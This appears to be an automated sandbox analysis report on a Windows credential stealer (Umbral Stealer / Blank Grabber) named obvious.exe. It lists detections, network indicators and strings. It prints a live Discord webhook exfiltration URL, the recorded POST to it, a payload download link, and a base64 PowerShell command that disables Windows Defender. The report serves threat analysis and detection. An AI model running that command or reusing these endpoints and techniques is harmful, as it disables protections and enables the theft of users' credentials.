Windows Analysis Report
obvious.exe

Overview

General Information

Sample name: obvious.exe
Analysis ID: 1500039
MD5: eabe2a81aa3dabab25e49ee4b36ce075
SHA1: f55b6298f0a8330d90d39e20a73adb2e828dfd1c
SHA256: 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686
Tags: exe
Infos:

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: obvious.exe Avira: detected
Antivirus detection for dropped file
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr Avira: detection malicious, Label: HEUR/AGEN.1307507
Found malware configuration
Source: obvious.exe Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX", "Version": "v1.3"}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr ReversingLabs: Detection: 78%
Multi AV Scanner detection for submitted file
Source: obvious.exe ReversingLabs: Detection: 78%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr Joe Sandbox ML: detected
Machine Learning detection for sample
Source: obvious.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC9378C CryptUnprotectData, 0_2_00007FFD9BC9378C
Uses 32bit PE files
Source: obvious.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: obvious.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.4:49740 -> 162.159.136.232:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost
Yara detected Generic Downloader
Source: Yara match File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 162.159.136.232 162.159.136.232
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown DNS query: name: ip-api.com
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 208.95.112.1:80
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: discord.com
Source: unknown HTTP traffic detected: POST /api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 939Expect: 100-continueConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.1775176597.000001E0C1DE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F616BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://discord.com
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F615E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: obvious.exe, uGCIY.scr.0.dr String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json/?fields=225545P
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: obvious.exe, uGCIY.scr.0.dr String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BE9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex=
Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: uGCIY.scr.0.dr String found in binary or memory: https://discord.com/api/v10/users/
Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ
Source: obvious.exe, uGCIY.scr.0.dr String found in binary or memory: https://discordapp.com/api/v9/users/
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: uGCIY.scr.0.dr String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gstatic.com
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gstatic.com/generate_204
Source: obvious.exe, uGCIY.scr.0.dr String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61713000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/12780529320964
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?e
Source: obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/12780529320964Pj
Source: powershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49740 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\obvious.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: obvious.exe, type: SAMPLE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAE3218 0_2_00007FFD9BAE3218
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BB089C0 0_2_00007FFD9BB089C0
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAEB128 0_2_00007FFD9BAEB128
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAE5760 0_2_00007FFD9BAE5760
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BADDFD0 0_2_00007FFD9BADDFD0
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAEAF45 0_2_00007FFD9BAEAF45
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAF1680 0_2_00007FFD9BAF1680
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BB245A0 0_2_00007FFD9BB245A0
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BB24528 0_2_00007FFD9BB24528
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAE445E 0_2_00007FFD9BAE445E
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAE8C36 0_2_00007FFD9BAE8C36
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BADF088 0_2_00007FFD9BADF088
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAE1CB6 0_2_00007FFD9BAE1CB6
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC97399 0_2_00007FFD9BC97399
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA02F0 0_2_00007FFD9BCA02F0
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA69E1 0_2_00007FFD9BCA69E1
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA89E2 0_2_00007FFD9BCA89E2
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA06CD 0_2_00007FFD9BCA06CD
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA364C 0_2_00007FFD9BCA364C
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC96C65 0_2_00007FFD9BC96C65
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC9DC67 0_2_00007FFD9BC9DC67
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC92438 0_2_00007FFD9BC92438
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC9092C 0_2_00007FFD9BC9092C
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC93060 0_2_00007FFD9BC93060
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC967C5 0_2_00007FFD9BC967C5
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BC9BE32 0_2_00007FFD9BC9BE32
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA6E43 0_2_00007FFD9BCA6E43
Sample file is different than original file name gathered from version info
Source: obvious.exe, 00000000.00000000.1680368592.0000012F5F5DC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs obvious.exe
Source: obvious.exe Binary or memory string: OriginalFilename vs obvious.exe
Uses 32bit PE files
Source: obvious.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: obvious.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: obvious.exe, ----.cs Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: obvious.exe, -------.cs Base64 encoded string: 'VoeLMljCcEVYfU8W72kDheVSIJZdBPUywVEujaMaKUX+PC3GIKJuwMiEe7SihdddwhgBZHoukcGwL8nohVpawkFH+1KHFQgONA+o1YtwWGfTOU3PHEhJpJmERZeGm0av3EWAZqAkP4emgxmXrx3wjZ4oQelWGSkFuJJzen3g9AooZA4nXbYa93I='
Source: uGCIY.scr.0.dr, ----.cs Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: uGCIY.scr.0.dr, -------.cs Base64 encoded string: 'VoeLMljCcEVYfU8W72kDheVSIJZdBPUywVEujaMaKUX+PC3GIKJuwMiEe7SihdddwhgBZHoukcGwL8nohVpawkFH+1KHFQgONA+o1YtwWGfTOU3PHEhJpJmERZeGm0av3EWAZqAkP4emgxmXrx3wjZ4oQelWGSkFuJJzen3g9AooZA4nXbYa93I='
Source: uGCIY.scr.0.dr, ----.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: uGCIY.scr.0.dr, ----.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: obvious.exe, ----.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
